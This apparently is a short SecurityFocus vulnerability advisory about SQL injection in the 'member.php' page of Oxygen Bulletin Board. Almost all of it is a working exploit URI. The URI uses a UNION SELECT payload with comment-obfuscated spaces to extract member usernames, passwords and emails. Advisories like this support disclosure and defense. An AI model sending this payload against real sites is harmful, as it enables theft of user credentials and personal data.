Oxygen Bulletin Board 'member.php' SQL Injection Vulnerability

An attacker can exploit this issue via a browser.

The following example URI and exploit code are available:

http://www.example.com/o2php_path/member.php?action=viewpro&member=1'/**/union/**/select/**/0,1,2,3,4,5,6,username,8,9,10,11,12,13,14,password,password,email,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45/**/from/**/o2_members/*


 

Privacy Statement
Copyright 2010, SecurityFocus